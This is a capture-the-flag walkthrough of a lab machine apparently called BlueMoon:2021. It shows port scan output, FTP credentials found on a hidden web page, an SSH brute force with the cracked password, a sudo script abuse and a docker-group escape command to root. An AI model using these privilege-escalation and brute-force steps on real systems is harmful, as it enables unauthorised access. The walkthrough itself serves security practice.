β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β
β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β ββ
Basic Summary:
So the machine is fairly simple theres http,ftp and ssh ports open. We obtain user credentials from the web server then after initial foothold we have a sh file we can run as another user. From there we have docker image running after entering the docker image we have root privileges B00M
SIMPLE AS THAT Lets speed through it.
β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β
β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β
##QUICK-LINKS
- RECON
- WEB
i.Directories
ii./hidden_text
iii.Ftp credentials - FTP
i.information.txt
ii.p_list.txt - Initial Foothold
- ROBIN
- Jerry
- Root
##RECON
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 2ce26378bc55fef3cb09a9d8262fcbd5 (RSA)
| 256 c4c86b489225a5f7009fabb256d5eddc (ECDSA)
|_ 256 a95b39a16e05910f753c880b557ca8c2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: BlueMoon:2021
MAC Address: 08:00:27:0A:CF:E0 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β
β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β
##WEB
I tried to connect to ftp server using anonymous credentials but it was disabled.Then on checking the web server running on port 80,
Then on some directory busting,
On Visiting the the /hidden_text page,
#!/bin/bash
HOST=ip
USER=userftp
PASSWORD=ftpp@ssword
ftp -inv $HOST user $USER $PASSWORD
bye
EOF
USER=userftp
PASSWORD=ftpp@ssword
β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β
β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β
##FTP
#information.txt
#p_list.txt
#SSH-Brute-Force
Using the name we got from information.txt ROBIN and the wordlist given we can bruteforce the login.
SSH://ROBIN:k4rv3ndh4nh4ck3r
β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β
β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β β
##ROBIN
There is a directory project.
and Boom the feedback variable can be used to change user
$ sudo -u jerry ./feedbash.sh
##JERRY
and Weβre jerry just like that!!!!
We are in docker group so lets just check for docker images
##R00T
docker run -v /:/mnt β rm -it alpine chroot /mnt s
B00M weβre root!
Thanks for reading. Happy hackin π